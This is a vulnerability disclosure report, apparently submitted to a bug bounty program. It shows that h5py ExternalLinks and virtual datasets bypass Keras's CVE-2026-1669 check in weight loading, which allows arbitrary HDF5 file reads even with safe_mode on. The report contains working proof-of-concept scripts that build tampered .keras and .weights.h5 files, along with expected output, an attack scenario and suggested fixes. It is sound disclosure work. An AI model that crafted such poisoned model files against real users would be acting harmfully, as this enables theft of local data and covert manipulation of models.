Huntr MFV Submission: Incomplete ExternalLink Fix in Keras HDF5 Weight Loading (CVE-2026-1669 Bypass)

Target: MFV -- Keras Native (.keras) format
Category: Path Traversal / Arbitrary File Read
Program: Model File Vulnerability


Title

Incomplete ExternalLink fix in Keras HDF5 weight loading bypasses CVE-2026-1669 check (arbitrary file read)

Description

A malicious .keras model or .weights.h5 file can read arbitrary HDF5 data from the victim's local filesystem by using h5py.ExternalLink objects in weight datasets. The CVE-2026-1669 fix in saving_lib.py checks dataset.external (the raw HDF5 external storage property) but does not detect h5py.ExternalLink, which h5py resolves transparently. The resulting dataset appears as a normal h5py.Dataset with .external = None, so the security check passes silently.

Both model.load_weights() and keras.saving.load_model() with safe_mode=True (the default) are affected.

Root Cause

The _verify_dataset() method in keras/src/saving/saving_lib.py (lines 1047-1057) performs a single security check:

def _verify_dataset(self, dataset):
    if not isinstance(dataset, h5py.Dataset):
        raise ValueError(
            f"Invalid H5 file, expected Dataset, received {type(dataset)}"
        )
    if dataset.external:
        raise ValueError(
            "Not allowed: H5 file Dataset with external links: "
            f"{dataset.external}"
        )
    return dataset

This check inspects dataset.external, which is the HDF5 raw external storage property (used for datasets whose raw data is stored in external binary files). This is a different mechanism from h5py.ExternalLink, which is an HDF5 link that points to a dataset in another HDF5 file.

When h5py encounters an ExternalLink, it transparently opens the target file and resolves the link to the dataset object. The resulting h5py.Dataset:

  • Passes isinstance(dataset, h5py.Dataset) -- it is a real Dataset
  • Has dataset.external == None -- the target dataset uses normal (non-external) storage
  • Contains data from the attacker-specified external file

The check was introduced in response to CVE-2026-1669 but only covers one of the two HDF5 mechanisms for referencing external data. h5py.ExternalLink is the more dangerous of the two because it can reference entire datasets in arbitrary HDF5 files, rather than just raw binary chunks.
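The transparent resolution is easy to demonstrate in isolation. In this minimal sketch (the /tmp paths are illustrative), a dataset reached through an ExternalLink passes both conditions of the _verify_dataset() check:

```python
import h5py
import numpy as np

# "Victim" file whose contents the attacker wants to read.
with h5py.File("/tmp/demo_target.h5", "w") as f:
    f.create_dataset("secret", data=np.array([42.0], dtype="float32"))

# "Malicious" file containing nothing but an ExternalLink.
with h5py.File("/tmp/demo_malicious.h5", "w") as f:
    f["payload"] = h5py.ExternalLink("/tmp/demo_target.h5", "/secret")

with h5py.File("/tmp/demo_malicious.h5", "r") as f:
    ds = f["payload"]                    # h5py resolves the link transparently
    assert isinstance(ds, h5py.Dataset)  # first check passes: real Dataset
    assert ds.external is None           # second check passes: no external storage
    print(ds[()])                        # data read from the other file
```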

Additional Gap: VirtualDataset

The _verify_dataset() check also does not inspect dataset.is_virtual. HDF5 Virtual Datasets (h5py.VirtualLayout / h5py.VirtualSource) can map regions of a dataset to data stored in other HDF5 files, providing a second bypass path using the same principle.
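The virtual-dataset gap can be sketched the same way (paths illustrative): the dataset reports is_virtual == True while .external stays None, so the existing check passes.

```python
import h5py
import numpy as np

# Source file holding the data to be mapped in.
with h5py.File("/tmp/demo_vds_source.h5", "w") as f:
    f.create_dataset("data", data=np.array([7.0], dtype="float32"))

# File whose dataset is a virtual view onto the other file.
layout = h5py.VirtualLayout(shape=(1,), dtype="float32")
layout[:] = h5py.VirtualSource("/tmp/demo_vds_source.h5", "data", shape=(1,))
with h5py.File("/tmp/demo_vds.h5", "w") as f:
    f.create_virtual_dataset("payload", layout)

with h5py.File("/tmp/demo_vds.h5", "r") as f:
    ds = f["payload"]
    assert ds.external is None  # the CVE-2026-1669 check would pass
    assert ds.is_virtual        # the property a complete fix must inspect
```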

Proof of Concept

Prerequisites

pip install keras==3.13.2 tensorflow h5py numpy

Step 1: Generate tampered model files

#!/usr/bin/env python3
"""
PoC Generator: HDF5 ExternalLink bypass (CVE-2026-1669)

Creates:
  1. An external HDF5 file with a sentinel value (simulating stolen data)
  2. A tampered .weights.h5 where the kernel dataset is replaced with
     an ExternalLink pointing to the external file
  3. A tampered .keras directory-format model with the same ExternalLink
"""
import os
import shutil
import sys

import h5py
import numpy as np

os.environ.setdefault("TF_CPP_MIN_LOG_LEVEL", "3")
import keras

# --- Configuration ---
EXTERNAL_H5_PATH = "/tmp/keras_h5_external_source.h5"
EXTERNAL_DATASET = "/stolen"
MARKER_VALUE = 42.0  # sentinel value to prove exfiltration

OUTPUT_DIR = os.path.dirname(os.path.abspath(__file__))
WEIGHTS_PATH = os.path.join(OUTPUT_DIR, "poc_tampered.weights.h5")
KERAS_DIR_PATH = os.path.join(OUTPUT_DIR, "poc_tampered_dir")


def create_external_source():
    """Create the external HDF5 file simulating data on the victim's filesystem."""
    print(f"[1] Creating external HDF5 source: {EXTERNAL_H5_PATH}")
    with h5py.File(EXTERNAL_H5_PATH, "w") as ef:
        ef.create_dataset(
            EXTERNAL_DATASET.lstrip("/"),
            data=np.array([[MARKER_VALUE]], dtype="float32"),
        )
    print(f"    Dataset '{EXTERNAL_DATASET}' = [[{MARKER_VALUE}]]")


def create_tampered_weights():
    """Create a legit .weights.h5 file, then replace kernel with ExternalLink."""
    print(f"[2] Creating tampered weights: {WEIGHTS_PATH}")

    model = keras.Sequential([
        keras.layers.Dense(1, input_shape=(1,), name="dense"),
    ])
    model.build((None, 1))

    legit_path = "/tmp/keras_extlink_legit.weights.h5"
    model.save_weights(legit_path)
    shutil.copy(legit_path, WEIGHTS_PATH)
    os.unlink(legit_path)

    kernel_path = "layers/dense/vars/0"

    with h5py.File(WEIGHTS_PATH, "a") as wf:
        original = wf[kernel_path][()]
        print(f"    Original kernel: {original}")
        del wf[kernel_path]
        wf[kernel_path] = h5py.ExternalLink(EXTERNAL_H5_PATH, EXTERNAL_DATASET)
        print(f"    Replaced with ExternalLink -> {EXTERNAL_H5_PATH}:{EXTERNAL_DATASET}")

    print(f"    Size: {os.path.getsize(WEIGHTS_PATH)} bytes")


def create_tampered_keras_dir():
    """Create a .keras directory-format model with tampered weights."""
    print(f"[3] Creating tampered .keras directory: {KERAS_DIR_PATH}")

    model = keras.Sequential([
        keras.layers.Dense(1, input_shape=(1,), name="dense"),
    ])
    model.build((None, 1))

    if os.path.isdir(KERAS_DIR_PATH):
        shutil.rmtree(KERAS_DIR_PATH)

    os.makedirs(KERAS_DIR_PATH, exist_ok=True)

    legit_zip = "/tmp/keras_extlink_legit.keras"
    model.save(legit_zip)

    import zipfile
    with zipfile.ZipFile(legit_zip, "r") as zf:
        for name in zf.namelist():
            target = os.path.join(KERAS_DIR_PATH, name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(name) as src, open(target, "wb") as dst:
                dst.write(src.read())

    os.unlink(legit_zip)

    weights_h5 = os.path.join(KERAS_DIR_PATH, "model.weights.h5")
    kernel_path = "layers/dense/vars/0"

    with h5py.File(weights_h5, "a") as wf:
        del wf[kernel_path]
        wf[kernel_path] = h5py.ExternalLink(EXTERNAL_H5_PATH, EXTERNAL_DATASET)

    print(f"    Weights tampered: {weights_h5}")
    print(f"    ExternalLink -> {EXTERNAL_H5_PATH}:{EXTERNAL_DATASET}")


if __name__ == "__main__":
    create_external_source()
    create_tampered_weights()
    create_tampered_keras_dir()
    print("\n[*] Artifacts ready. Run poc_verify.py to confirm the bypass.")

Step 2: Verify bypass

#!/usr/bin/env python3
"""Verify the HDF5 ExternalLink bypass against CVE-2026-1669 fix."""
import os
import sys

os.environ.setdefault("TF_CPP_MIN_LOG_LEVEL", "3")
import keras
import numpy as np

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
WEIGHTS_PATH = os.path.join(SCRIPT_DIR, "poc_tampered.weights.h5")
KERAS_DIR_PATH = os.path.join(SCRIPT_DIR, "poc_tampered_dir")
MARKER_VALUE = 42.0


def check_weights_for_marker(weights, label):
    """Check if any weight array contains the sentinel value."""
    print(f"    Weight arrays: {len(weights)}")
    for i, w in enumerate(weights):
        print(f"      weight[{i}] shape={w.shape} values={w.tolist()}")

    found = any(MARKER_VALUE in w.flatten() for w in weights)
    if found:
        print(f"\n    >>> BYPASS CONFIRMED ({label}) <<<")
        print(f"    >>> Sentinel {MARKER_VALUE} loaded from external file")
        print(f"    >>> CVE-2026-1669 _verify_dataset check was NOT triggered")
    return found


# Vector 1: model.load_weights()
print("=" * 60)
print("Vector 1: model.load_weights() on tampered .weights.h5")
print("=" * 60)
model = keras.Sequential([keras.layers.Dense(1, input_shape=(1,), name="dense")])
model.build((None, 1))
model.load_weights(WEIGHTS_PATH)
v1 = check_weights_for_marker(model.get_weights(), "load_weights")

# Vector 2: load_model() with safe_mode=True
print("\n" + "=" * 60)
print("Vector 2: load_model() on tampered .keras dir (safe_mode=True)")
print("=" * 60)
model2 = keras.saving.load_model(KERAS_DIR_PATH, safe_mode=True)
v2 = check_weights_for_marker(model2.get_weights(), "load_model")

if v1 and v2:
    print("\nRESULT: VULNERABILITY CONFIRMED -- both vectors bypass CVE-2026-1669")

Step 3: Expected output

============================================================
Vector 1: model.load_weights() on tampered .weights.h5
============================================================
    Weight arrays: 2
      weight[0] shape=(1, 1) values=[[42.0]]
      weight[1] shape=(1,) values=[0.0]

    >>> BYPASS CONFIRMED (load_weights) <<<
    >>> Sentinel 42.0 loaded from external file
    >>> CVE-2026-1669 _verify_dataset check was NOT triggered

============================================================
Vector 2: load_model() on tampered .keras dir (safe_mode=True)
============================================================
    Weight arrays: 2
      weight[0] shape=(1, 1) values=[[42.0]]
      weight[1] shape=(1,) values=[0.0]

    >>> BYPASS CONFIRMED (load_model dir) <<<
    >>> Sentinel 42.0 loaded from external file
    >>> CVE-2026-1669 _verify_dataset check was NOT triggered

RESULT: VULNERABILITY CONFIRMED -- both vectors bypass CVE-2026-1669

The model's kernel weight, which was originally a random float, now contains 42.0 -- the sentinel value from the external HDF5 file. The _verify_dataset() check did not raise any exception because the resolved dataset's .external property is empty.

One-liner reproduction

bash reproduce.sh

Impact

Attack Scenario

  1. Attacker crafts a .keras model (or .weights.h5 file) where one or more weight datasets are replaced with h5py.ExternalLink objects pointing to known HDF5 file paths on the victim's system
  2. Model is distributed via HuggingFace Hub, Kaggle, or any model-sharing platform
  3. Victim loads the model: model = keras.saving.load_model("model.keras") or model.load_weights("weights.h5") -- using all default safety settings
  4. h5py transparently follows the ExternalLinks, reading data from the victim's local HDF5 files into the model's weight tensors
  5. Attacker recovers the exfiltrated data by observing the model's inference output (which now reflects the stolen weights)

Concrete Exploitation

Weight poisoning / model integrity violation: An attacker replaces critical weight tensors with data sourced from external files. The model loads without error but produces attacker-controlled outputs. In safety-critical ML pipelines (medical imaging, autonomous systems, financial modeling), this silently corrupts inference results.

Arbitrary HDF5 file read: Many ML environments store sensitive data in HDF5 format -- other model weights, preprocessed datasets, experimental results, feature stores. The attacker can target known paths (e.g., ~/.keras/models/, common dataset directories) to exfiltrate this data through the model's weight tensors.

Information disclosure via inference: If the victim deploys the poisoned model as an API, the attacker can extract the stolen data by querying the model and observing outputs. The weight values directly influence inference results, creating a covert data exfiltration channel.

Why This Is Significant

  1. Bypasses an existing CVE fix. CVE-2026-1669 was specifically intended to block external data references in HDF5 model files. This bypass renders that mitigation incomplete.
  2. Works with safe_mode=True. The default safety setting provides no protection. There is no user action that prevents the attack short of inspecting raw HDF5 link structure before loading.
  3. Silent exploitation. No warnings, no errors, no exceptions. The model loads and runs normally. The only observable difference is in the weight values themselves.
  4. Low attacker complexity. Crafting the malicious file requires only standard h5py API calls (h5py.ExternalLink). No binary manipulation or format corruption needed.
  5. Broad attack surface. Affects model.load_weights(), keras.saving.load_model() (directory format), and potentially ZIP format when Keras extracts to a temporary directory for large models.

Comparison to CVE-2026-1669

Aspect                           | CVE-2026-1669 (dataset.external)  | This Finding (h5py.ExternalLink)
Mechanism                        | Raw HDF5 external storage         | HDF5 symbolic link to another file
Detected by _verify_dataset      | Yes                               | No
Requires special HDF5 features   | Yes (external storage API)        | No (standard h5py link API)
h5py resolves transparently      | No (external property visible)    | Yes (link invisible after resolution)
Fix complexity                   | Check dataset.external (done)     | Must inspect link type before resolution

Root Cause: Two External-Data Mechanisms

HDF5 has two distinct mechanisms for referencing data stored outside the current file:

  1. External storage (dataset.external) -- A dataset property where the raw binary data is stored in a separate file. The dataset metadata remains in the original file. This is what CVE-2026-1669 checks for.

  2. ExternalLink (h5py.ExternalLink) -- An HDF5 link object that points to a group or dataset in a completely different HDF5 file. When h5py traverses the link, it transparently opens the target file and returns the resolved object. The caller sees a normal h5py.Dataset with no indication it came from another file.

The _verify_dataset() check at saving_lib.py:1047-1057 only handles mechanism (1). Mechanism (2) is more dangerous because it operates at the link level, before the dataset object is even constructed, and h5py provides no property on the resolved dataset indicating it was reached via an ExternalLink.
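For contrast, mechanism (1) is the case the existing check does catch. In this minimal sketch (paths illustrative), a dataset backed by raw external storage exposes a populated .external property:

```python
import h5py
import numpy as np

# Raw binary file holding the dataset's bytes (mechanism 1).
raw = np.zeros(4, dtype="float64")
raw.tofile("/tmp/demo_raw.bin")

with h5py.File("/tmp/demo_extstore.h5", "w") as f:
    f.create_dataset(
        "w", shape=(4,), dtype="float64",
        external=[("/tmp/demo_raw.bin", 0, raw.nbytes)],
    )

with h5py.File("/tmp/demo_extstore.h5", "r") as f:
    ds = f["w"]
    assert ds.external is not None  # visible, so _verify_dataset() rejects it
```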

Suggested Fix

Immediate: Block ExternalLink resolution

Two changes are needed. First, extend _verify_dataset() so that it also rejects virtual datasets:

def _verify_dataset(self, dataset):
    if not isinstance(dataset, h5py.Dataset):
        raise ValueError(
            f"Invalid H5 file, expected Dataset, received {type(dataset)}"
        )
    if dataset.external:
        raise ValueError(
            "Not allowed: H5 file Dataset with external links: "
            f"{dataset.external}"
        )
    if dataset.is_virtual:
        raise ValueError(
            "Not allowed: H5 file Dataset with virtual sources"
        )
    return dataset

And in all code paths that access entries in an HDF5 group, check the link type before resolving:

def _verify_link(self, group, key):
    link = group.get(key, getlink=True)
    if isinstance(link, h5py.ExternalLink):
        raise ValueError(
            f"Not allowed: ExternalLink in H5 file at '{key}' "
            f"-> {link.filename}:{link.path}"
        )
    if isinstance(link, h5py.SoftLink):
        # SoftLinks resolve within the same file and cannot read external
        # data; validate here only if a stricter policy (e.g. cycle
        # detection) is desired.
        pass

Additional: Block VirtualDataset

Add dataset.is_virtual check to block h5py.VirtualLayout / h5py.VirtualSource references to external files.

Architectural

Recursively walk all groups in the HDF5 file at load time and reject any entry whose link type is h5py.ExternalLink, before h5py has a chance to resolve it. This provides defense-in-depth regardless of where datasets are accessed.

Affected Versions

Keras: 3.13.2 (latest, tested 2026-02-22)
h5py: 3.12+ (ExternalLink support has existed since h5py 2.x)
Python: 3.13

All Keras 3.x versions that include the CVE-2026-1669 fix are affected, as the fix is incomplete. Keras versions prior to the CVE-2026-1669 fix are also affected (but by the original vulnerability, not this bypass).

CWE Classification

  • CWE-22 (Improper Limitation of a Pathname to a Restricted Directory / Path Traversal) -- The ExternalLink allows referencing files outside the intended model file boundary
  • CWE-73 (External Control of File Name or Path) -- Attacker controls which external file is read via the ExternalLink path

Files

poc_generator.py         -- Generates tampered model files with ExternalLink
poc_verify.py            -- Verifies bypass on both attack vectors
reproduce.sh             -- One-command reproduction script
verification_output.txt  -- Captured output from verification run